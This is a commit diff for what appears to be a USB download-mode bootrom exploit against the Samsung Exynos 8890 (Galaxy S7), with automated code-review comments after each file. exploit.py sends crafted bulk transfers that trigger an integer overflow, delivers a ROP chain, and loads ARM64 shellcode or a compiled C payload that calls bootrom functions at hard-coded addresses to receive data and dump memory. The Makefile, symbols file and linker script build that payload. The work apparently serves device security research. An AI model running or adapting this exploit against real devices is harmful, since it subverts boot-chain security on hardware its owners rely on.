found another bug
parent
d7a740d173
commit
a9def4a27d
17
Makefile
Normal file
17
Makefile
Normal file
@ -0,0 +1,17 @@
|
|||||||
|
ifeq ($(ANDROID_NDK_ROOT),)
|
||||||
|
$(error Error : Set the env variable 'ANDROID_NDK_ROOT' with the path of the Android NDK (version 20))
|
||||||
|
endif
|
||||||
|
|
||||||
|
CC := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android27-clang
|
||||||
|
AR := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-ar
|
||||||
|
OBJCOPY := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-objcopy
|
||||||
|
LD := $(ANDROID_NDK_ROOT)/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android-ld.bfd
|
||||||
|
|
||||||
|
#==================Target Samsung S7 (8890)==================
|
||||||
|
CFLAGS_SAMSUNGS7 = -Os
|
||||||
|
|
||||||
|
dwc3:
|
||||||
|
$(CC) entry.S -c -o entry.o $(CFLAGS_SAMSUNGS7)
|
||||||
|
$(CC) $(CFLAGS_SAMSUNGS7) -c test_dwc3.c -o dwc3.o
|
||||||
|
$(LD) -T test_dwc3.ld entry.o dwc3.o -o dwc3.elf --just-symbols=symbols.txt
|
||||||
|
$(OBJCOPY) -O binary dwc3.elf dwc3.bin
|
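Review bot: The `dwc3` target has no prerequisites and is not declared phony, so it is rebuilt every run only as long as no file named `dwc3` exists in the directory; add `.PHONY: dwc3` (or list `entry.S`, `test_dwc3.c`, `test_dwc3.ld` and `symbols.txt` as prerequisites so edits to them are tracked). The four toolchain paths hard-code the `linux-x86_64` host tag, which the `$(error ...)` text about `ANDROID_NDK_ROOT` does not mention; factoring it into one variable such as `NDK_HOST ?= linux-x86_64` keeps the recipe usable from other hosts and makes the assumption visible. The `#==================Target Samsung S7 (8890)==================` header introduces only `CFLAGS_SAMSUNGS7 = -Os`; a one-line comment stating that the `dwc3` rule below belongs to that target would make the grouping explicit.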
146
exploit.py
146
exploit.py
@ -1,6 +1,8 @@
|
|||||||
import usb.core
|
import usb.core
|
||||||
import usb.util
|
import usb.util
|
||||||
import struct, sys, usb1, libusb1, ctypes
|
import struct, sys, usb1, libusb1, ctypes, usb
|
||||||
|
from keystone import *
|
||||||
|
from capstone import *
|
||||||
# from ghidra_assistant.utils.utils import *
|
# from ghidra_assistant.utils.utils import *
|
||||||
|
|
||||||
def p32(x):
|
def p32(x):
|
||||||
@ -73,6 +75,26 @@ class ExynosDevice():
|
|||||||
assert(res == 0)
|
assert(res == 0)
|
||||||
return transfered
|
return transfered
|
||||||
|
|
||||||
|
def test_bug_2(self):
|
||||||
|
# Also bug here
|
||||||
|
# payload = p32(1) + p32(CHUNK_SIZE + 0x2001) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
|
||||||
|
# self.write(payload, MAX_PAYLOAD_SIZE)
|
||||||
|
# self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE)
|
||||||
|
|
||||||
|
transferred = ctypes.c_int()
|
||||||
|
bug_payload = p32(0) + p32(MAX_PAYLOAD_SIZE + 0x100) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
|
||||||
|
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
|
||||||
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
|
||||||
|
assert res == 0
|
||||||
|
|
||||||
|
payload = b"\xaa" * 0x200
|
||||||
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
|
||||||
|
assert res == 0
|
||||||
|
|
||||||
|
payload = b"\xaa" * (0x401 - (MAX_PAYLOAD_SIZE - 0x200))
|
||||||
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
|
||||||
|
pass
|
||||||
|
|
||||||
def test_bug(self):
|
def test_bug(self):
|
||||||
# Start by sending a valid packet
|
# Start by sending a valid packet
|
||||||
# Integer overflow in the size field
|
# Integer overflow in the size field
|
||||||
@ -109,11 +131,6 @@ class ExynosDevice():
|
|||||||
assert transferred.value == len(bug_payload), "Invalid transfered size"
|
assert transferred.value == len(bug_payload), "Invalid transfered size"
|
||||||
current_offset += len(bug_payload) - 8 # Remove header
|
current_offset += len(bug_payload) - 8 # Remove header
|
||||||
|
|
||||||
# Send the actual payload
|
|
||||||
# res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
|
|
||||||
# assert res == 0, "Error sending payload"
|
|
||||||
# current_offset += len(payload)
|
|
||||||
|
|
||||||
cnt = 0
|
cnt = 0
|
||||||
while True:
|
while True:
|
||||||
if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]:
|
if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]:
|
||||||
@ -138,18 +155,129 @@ class ExynosDevice():
|
|||||||
rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
|
rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
|
||||||
transferred = ctypes.c_int(0)
|
transferred = ctypes.c_int(0)
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
|
||||||
# assert transferred.value == len(rop_chain), "Error sending ROP chain"
|
assert res == 0, "Error sending ROP chain"
|
||||||
|
|
||||||
buf = ctypes.c_buffer(b"", 0x200000)
|
# Send some data
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000)
|
p = b"\xaa" * 0x200
|
||||||
|
transferred.value = 0
|
||||||
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100)
|
||||||
|
|
||||||
|
buf = ctypes.c_buffer(b"", 0x20000)
|
||||||
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100)
|
||||||
|
|
||||||
|
# Should have received some bytes
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN)
|
||||||
|
def usb_debug():
|
||||||
|
shellcode = f"""
|
||||||
|
start:
|
||||||
|
adr x0, test_fun
|
||||||
|
ldr x0, [x0]
|
||||||
|
blr x0
|
||||||
|
|
||||||
|
mov w1, #0x20000 // size
|
||||||
|
mov w0, #0x0 // address
|
||||||
|
bl usb_send
|
||||||
|
mov x0, #0
|
||||||
|
br x0 //reset
|
||||||
|
|
||||||
|
#Setup read usb
|
||||||
|
mov w0, #0x2
|
||||||
|
adr x1, shellcode_base
|
||||||
|
ldr x1, [x1]
|
||||||
|
mov w2, #0x02020000
|
||||||
|
add w2, w2, #0x2000
|
||||||
|
# endpoint, cb, buffer
|
||||||
|
adr x5, maybe_usb_setup_read
|
||||||
|
ldr x5, [x5]
|
||||||
|
blr x5
|
||||||
|
|
||||||
|
|
||||||
|
# Get something?? arg0 is endpoint
|
||||||
|
mov w0, #0x2
|
||||||
|
adr x1, maybe_read_size_endpoint
|
||||||
|
ldr x1, [x1]
|
||||||
|
blr x1
|
||||||
|
|
||||||
|
|
||||||
|
# # Send some data from ROM
|
||||||
|
# mov w1, #0x200 // size
|
||||||
|
# mov w0, #0x0 // address
|
||||||
|
# bl usb_send
|
||||||
|
# mov x0, #0
|
||||||
|
# br x0 //reset
|
||||||
|
|
||||||
|
|
||||||
|
# # dwc3_ep0_start_trans
|
||||||
|
# mov w1, w0
|
||||||
|
# mov w0, #0x2
|
||||||
|
# mov w2, #0x200
|
||||||
|
# adr x5, dwc3_ep0_start_trans
|
||||||
|
# ldr x5, [x5]
|
||||||
|
# blr x5
|
||||||
|
|
||||||
|
# # Send some data from ROM
|
||||||
|
# mov w1, #0x200 // size
|
||||||
|
# mov w0, #0x0 // address
|
||||||
|
# bl usb_send
|
||||||
|
# mov x0, #0
|
||||||
|
# br x0 //reset
|
||||||
|
|
||||||
|
usb_send:
|
||||||
|
stp x29, x30, [sp,#-48]!
|
||||||
|
mov w3, #0x0
|
||||||
|
bfxil w3, w1, #0, #24
|
||||||
|
mov w1, #0xc12
|
||||||
|
mov x29, sp
|
||||||
|
stp x19, x20, [sp,#16]
|
||||||
|
mov x5, #0xc834
|
||||||
|
mov w20, #0x1
|
||||||
|
movk x5, #0x1540, lsl #16
|
||||||
|
ldr x2, [x29,#40]
|
||||||
|
mov x4, #0xc838
|
||||||
|
orr w6, w1, w20
|
||||||
|
movk x4, #0x1540, lsl #16
|
||||||
|
mov x19, #0xc83c
|
||||||
|
movk x19, #0x1540, lsl #16
|
||||||
|
stp w3, w1, [x2,#8]
|
||||||
|
mov w3, #0x406
|
||||||
|
stp w0, wzr, [x2]
|
||||||
|
mov w0, w20
|
||||||
|
ldr x1, [x29,#40]
|
||||||
|
strb w6, [x2,#12]
|
||||||
|
mov x2, #0x27c8
|
||||||
|
str w1, [x5]
|
||||||
|
mov w1, #0x1388
|
||||||
|
str wzr, [x4]
|
||||||
|
str w3, [x19]
|
||||||
|
blr x2
|
||||||
|
mov w0, w20
|
||||||
|
ldr w1, [x19]
|
||||||
|
ldp x19, x20, [sp,#16]
|
||||||
|
ldp x29, x30, [sp],#48
|
||||||
|
ret
|
||||||
|
|
||||||
|
usb_read_endpoint: .quad 0x00006654
|
||||||
|
maybe_usb_setup_read: .quad 0x00006f88
|
||||||
|
shellcode_base: .quad 0x02021800
|
||||||
|
maybe_read_size_endpoint: .quad 0x00007a7c
|
||||||
|
dwc3_ep0_start_trans: .quad 0x0000791c
|
||||||
|
test_fun: .quad 0x000064e0
|
||||||
|
"""
|
||||||
|
shellcode = ks.asm(shellcode, as_bytes=True)[0]
|
||||||
|
|
||||||
|
shellcode = open("dwc3.bin", "rb").read()
|
||||||
|
|
||||||
|
exynos = ExynosDevice()
|
||||||
|
exynos.exploit(shellcode)
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
|
usb_debug()
|
||||||
|
sys.exit(0)
|
||||||
# wait_for_device()
|
# wait_for_device()
|
||||||
exynos = ExynosDevice()
|
exynos = ExynosDevice()
|
||||||
|
exynos.test_bug_2()
|
||||||
path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin"
|
path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin"
|
||||||
# path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin"
|
# path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin"
|
||||||
exynos.exploit(open(path, "rb").read())
|
exynos.exploit(open(path, "rb").read())
|
||||||
|
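Review bot: In `usb_debug()` the bytes produced by `shellcode = ks.asm(shellcode, as_bytes=True)[0]` are discarded two lines later by `shellcode = open("dwc3.bin", "rb").read()`, which also never closes the file; if the C payload is now the intended path, drop or flag-guard the Keystone block and read the file with `with open("dwc3.bin", "rb") as f: shellcode = f.read()`. In the `__main__` block the new `usb_debug()` followed by `sys.exit(0)` makes the `exynos.test_bug_2()` and `exynos.exploit(open(path, "rb").read())` lines below it unreachable; if that is intentional, say so in a comment, otherwise delete the dead tail. `test_bug_2` ends with `pass` after its last `libusb_bulk_transfer`, so unlike the two calls above it the returned `res` is never checked; either `assert res == 0` like the others or add a comment explaining why an error is expected there. The `0` timeout passed to those three transfers means libusb waits without limit, so a device that stops responding hangs the script, whereas the later calls in `test_bug` use bounded `100`/`1000` values.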
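--- a/symbols.txt
+++ b/symbols.txt
@@ -0,0 +1,5 @@
+maybe_usb_setup_read = 0x00006f88;
+dwc3_ep0_start_trans = 0x0000791c;
+usb_event_handler = 0x00007bac;
+get_endpoint_buffer = 0x00007a7c;
+sleep = 0x000027c8;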
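--- a/test_dwc3.c
+++ b/test_dwc3.c
@@ -0,0 +1,57 @@
+#include <stdint.h>
+
+// Create external function at 0x00006f88
+extern void maybe_usb_setup_read(char endpoint,void *fun,uint32_t target_buffer);
+extern void dwc3_ep0_start_trans(char endpoint,uint32_t target_buf, uint32_t len);
+extern int usb_event_handler(void);
+extern void * get_endpoint_buffer(char endpoint);
+extern void sleep(int endpoint,uint32_t timeout);
+
+#define recv_buffer 0x02021800 + 0x2000
+#define data_received 0x02021800 + 0x2004
+
+// do {
+// /* loops until image has been received */
+// usb_event_handler();
+// iVar2 = download_ready?(); #TODO, set some global to indicate readyness
+// } while (iVar2 == 0);
+
+void recv_data_cb(uint32_t endpoint, uint32_t len){
+void *rbuf;
+void *dest_buf = (void *)recv_buffer;
+volatile void *dref = (void *)data_received;
+
+for(int i= 0; i < len; i++){
+rbuf = get_endpoint_buffer(2);
+*(char *)dest_buf = *(char *)(void *)((int)rbuf + i);
+}
+// while(1){}
+// asm("mov x0, #0x0");
+// asm("br x0");
+*(uint8_t *)dref = 3;
+}
+
+void recv_data(){
+// Set data_received to 0
+// uint32_t *r = (uint32_t *) data_received;
+// r = 0;
+volatile void *dref = (void *)data_received;
+*(uint8_t *)dref = 0;
+
+maybe_usb_setup_read(2, recv_data_cb, 1);
+while(1){
+usb_event_handler();
+if(*(uint8_t *)dref == 3){
+break;
+}
+sleep(1, 10);
+}
+}
+
+int main() {
+recv_data();
+// recv_data();
+// sleep(1, 5000);
+asm("mov x0, #0x0");
+asm("br x0");
+}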
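Review bot: `#define recv_buffer 0x02021800 + 0x2000` and `#define data_received 0x02021800 + 0x2004` are unparenthesised expression macros, so `(void *)recv_buffer` yields the intended address only because the cast binds to the first literal and the `+ 0x2000` is then applied as arithmetic on a `void *` (a GNU extension); write them as `#define recv_buffer (0x02021800 + 0x2000)` and `#define data_received (0x02021800 + 0x2004)` so the value does not depend on the context the macro is expanded in. The loop header `for(int i= 0; i < len; i++)` compares a signed `int` with the `uint32_t len`, which `-Wextra` reports as a sign-compare; declaring `uint32_t i` matches the parameter type. The `// Create external function at 0x00006f88` comment documents only the first of the five `extern` prototypes; a one-line comment stating that all of them are resolved from `symbols.txt` through the Makefile's `--just-symbols=symbols.txt` would make that dependency explicit for the next reader.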
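--- a/test_dwc3.ld
+++ b/test_dwc3.ld
@@ -0,0 +1,14 @@
+MEMORY {
+ROM (rwx): ORIGIN = 0x02021800, LENGTH = 0x1000
+}
+
+SECTIONS
+{
+. = 0x02021800;
+.text . : {
+*(.text*)
+*(.data*)
+*(.rodata*)
+} >ROM
+
+}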
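Review bot: The memory region is named `ROM` but declared `(rwx)` at `ORIGIN = 0x02021800`, the same value exploit.py's `shellcode_base: .quad 0x02021800` refers to, so the name contradicts how the region is used; naming it `RAM` (or `SRAM`) would stop readers assuming it is read-only. The single `.text` output section collects `*(.text*)`, `*(.data*)` and `*(.rodata*)` but not `*(.bss*)`, so any zero-initialised global added to test_dwc3.c later would be placed as an orphan section wherever ld.bfd chooses rather than inside the `>ROM` region; adding `*(.bss*)` to the same block (or a separate `.bss` section `>ROM`) avoids that surprise while the script is still small.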